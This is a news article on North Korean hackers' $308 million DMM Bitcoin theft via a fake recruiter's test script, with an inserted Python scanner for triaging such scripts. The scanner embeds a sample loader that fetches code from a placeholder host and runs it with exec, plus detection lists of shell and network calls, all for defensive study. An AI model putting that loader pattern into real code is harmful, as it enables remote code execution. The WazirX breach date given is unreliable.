Key Takeaways
In May 2024, Japanese cryptocurrency exchange DMM Bitcoin Co. suffered a staggering loss of 48 billion yen (approximately $308 million) in what has now been confirmed as the largest crypto exploit of the year.
According to the FBI, the attack was orchestrated by North Korean hackers, who are notorious for such high-profile breaches.
Utilizing sophisticated social engineering tactics, the group exploited human vulnerabilities to bypass security protocols, a hallmark of their recent operations.
The FBI’s investigation revealed that North Korean hackers posed as recruiters on LinkedIn, targeting a Ginco employee with access to wallet management systems.
After initiating contact in March 2024, the hackers sent the employee a malicious Python script disguised as a pre-employment test.
Unwittingly, the victim uploaded the script to their personal GitHub page, compromising their system and exposing Ginco’s unencrypted communication channels.
This breach enabled the hackers to intercept and manipulate a legitimate transaction request in May, resulting in the theft of 4,502.9 BTC, valued at $308 million at the time.
The FBI noted that this attack aligns with a pattern of “TraderTraitor” threat activity, also tracked under aliases like Jade Sleet and UNC4899.
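The delivery mechanism described above, a "pre-employment test" script that the target is expected to run, is a recurring TraderTraitor technique. The page gives no details of the script itself, so the following is an added example (not from the FBI report or any party named on the page) of a simple static triage check a defender can run over an untrusted Python file before anyone executes it. It walks the AST and flags the constructs that a coding-test script has no business containing: dynamic execution, especially of a decoded payload, outbound network calls, and shell commands. The sample "test" script is constructed for this example, and the host name in it is a placeholder.

```python
import ast

# Constructed sample of what a "take-home coding test" might look like: a
# legitimate task with a loader buried beneath it. It is only parsed here,
# never executed. The URL host is a placeholder, not a real indicator.
SAMPLE_TEST_SCRIPT = '''
import base64, urllib.request

def fizzbuzz(n):
    return "FizzBuzz" if n % 15 == 0 else "Fizz" if n % 3 == 0 else "Buzz" if n % 5 == 0 else str(n)

# "telemetry" helper buried below the real task
_cfg = urllib.request.urlopen("http://example.invalid/cfg").read()
exec(base64.b64decode(_cfg))
'''

# Constructed benign control: a script that should produce no findings.
BENIGN_SCRIPT = "def add(a, b):\n    return a + b\n"

DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
NETWORK = {"urllib.request.urlopen", "requests.get", "requests.post", "socket.socket"}
SHELL = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
         "subprocess.call", "subprocess.check_output"}
DECODERS = {"base64.b64decode", "base64.b85decode", "zlib.decompress", "codecs.decode"}


def _qualname(node):
    """Dotted name of a call target (e.g. 'base64.b64decode'), or None if it
    is not a plain name/attribute chain (e.g. the result of another call)."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _qualname(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


class _Finder(ast.NodeVisitor):
    def __init__(self):
        self.findings = []

    def visit_Call(self, node):
        name = _qualname(node.func)
        if name in DYNAMIC_EXEC:
            # exec()/eval() fed directly by a decoder call is the classic
            # decode-then-run loader shape; report it separately.
            inner = [_qualname(a.func) for a in node.args if isinstance(a, ast.Call)]
            kind = "dynamic-exec-of-decoded-payload" if any(i in DECODERS for i in inner) else "dynamic-exec"
            self.findings.append((node.lineno, kind, name))
        elif name in NETWORK:
            self.findings.append((node.lineno, "network-access", name))
        elif name in SHELL:
            self.findings.append((node.lineno, "shell-command", name))
        self.generic_visit(node)  # keep walking: nested calls matter too


def scan_source(source: str) -> list:
    """Return (line, kind, target) findings for the given Python source, sorted by line."""
    finder = _Finder()
    finder.visit(ast.parse(source))
    return sorted(finder.findings)


def risk_summary(findings) -> str:
    """Collapse findings into a triage verdict. Decoded-payload execution, or
    dynamic execution combined with network access, is treated as HIGH."""
    kinds = {k for _, k, _ in findings}
    if "dynamic-exec-of-decoded-payload" in kinds or {"dynamic-exec", "network-access"} <= kinds:
        return "HIGH"
    if kinds:
        return "MEDIUM"
    return "LOW"


if __name__ == "__main__":
    findings = scan_source(SAMPLE_TEST_SCRIPT)
    for lineno, kind, target in findings:
        print(f"line {lineno}: {kind} via {target}()")
    print("overall:", risk_summary(findings))
```

On the constructed sample this reports the `urlopen` call and the `exec(base64.b64decode(...))` loader and rates the file HIGH, while the benign control yields no findings. A check like this is a triage aid, not a control: trivial obfuscation (string-built attribute names, `getattr`, imports under aliases) will slip past it, so the durable mitigation is procedural rather than syntactic: recruiting-style code from an unverified party is run, if at all, in a disposable sandbox with no access to wallet, signing or internal communication credentials.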
North Korean hackers have become synonymous with large-scale crypto theft.
Recent on-chain analyses revealed that DPRK-linked wallets have been active on multiple platforms, raising concerns about ongoing and future exploits.
One key area of focus is Hyperliquid, a decentralized leverage trading platform.
Analysts observed that North Korean-linked wallets lost $700,000 in leveraged trades over the past few months, leading to speculation that the group is probing for vulnerabilities.
Hyperliquid’s USDC bridge, guarded by just four validators overseeing $22 billion in assets, is particularly at risk. Experts warn that compromising three validators could enable the theft of at least $2.3 billion.
Meanwhile, DPRK wallets have also been linked to suspicious activity on MetaMask, a widely used decentralized wallet platform.
Alleged hackers reportedly moved $200,000 through MetaMask and profited $1,985 in swap fees, a possible prelude to more significant exploits. “DPRK doesn’t trade. DPRK tests,” one crypto analyst cautioned.
In 2024, North Korean hacking groups were responsible for 61% of all stolen cryptocurrency, totaling $1.3 billion in illicit gains.
The Lazarus Group alone accounted for 20% of all known hacking incidents, shifting their focus from decentralized platforms to centralized exchanges with larger asset pools.
Following the DMM attack, India-based exchange WazirX suffered a $234 million breach in June, further highlighting this trend.
Both cases illustrate how the group has refined its tactics, leveraging social engineering as a powerful tool to bypass even the most advanced security measures.
As the year draws to a close, the crypto industry faces mounting pressure to bolster defenses and preempt emerging threats.